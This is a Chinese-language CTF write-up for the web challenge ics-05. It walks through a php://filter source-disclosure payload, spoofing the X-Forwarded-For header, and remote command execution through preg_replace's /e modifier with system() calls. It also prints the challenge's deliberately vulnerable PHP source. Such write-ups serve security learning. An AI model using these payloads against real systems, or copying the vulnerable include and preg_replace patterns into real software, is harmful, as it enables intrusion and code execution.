挺有意思的一题
攻防世界->web->ics-05
打开题目链接,就是一个很正常的管理系统,只有左侧的可以点着玩
并且点到**设备维护中心时,页面变为index.php
查看响应
发现云平台设备维护中心有东西
点击会发现多了一个参数page=index,
首先想到php伪协议利用成功
page=php://filter/convert.base64-encode/resource=index.php
base64解码,最后有一段这个玩意
<?php
$page = $_GET[page];
if (isset($page)) {
if (ctype_alnum($page)) {
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead"><?php echo $page; die();?></p>
<br /><br /><br /><br />
<?php
}else{
?>
<br /><br /><br /><br />
<div style="text-align:center">
<p class="lead">
<?php
if (strpos($page, 'input') > 0) {
die();
}
if (strpos($page, 'ta:text') > 0) {
die();
}
if (strpos($page, 'text') > 0) {
die();
}
if ($page === 'index.php') {
die('Ok');
}
include($page);
die();
?>
</p>
<br /><br /><br /><br />
<?php
}}
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
?>
page是我们利用过的,那么接下来就是要利用下面的部分。
$_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1'
构造请求X-Forwarded-For: 127.0.0.1
然后利用preg_replace()
其中:/e 修正符使 preg_replace() 将 replacement 参数当作 PHP 代码(在适当的逆向引用替换完之后)。
也就是说:要确保 replacement 构成一个合法的 PHP 代码字符串
?pat=/unsion/e&rep=system('ls')&sub=unsion
查找文件名含有flag
?pat=/unsion/e&rep=system('find * -name *flag*')&sub=unsion
输出结果
?pat=/unsion/e&rep=system('tac s3chahahaDir/flag/flag.php')&sub=unsion
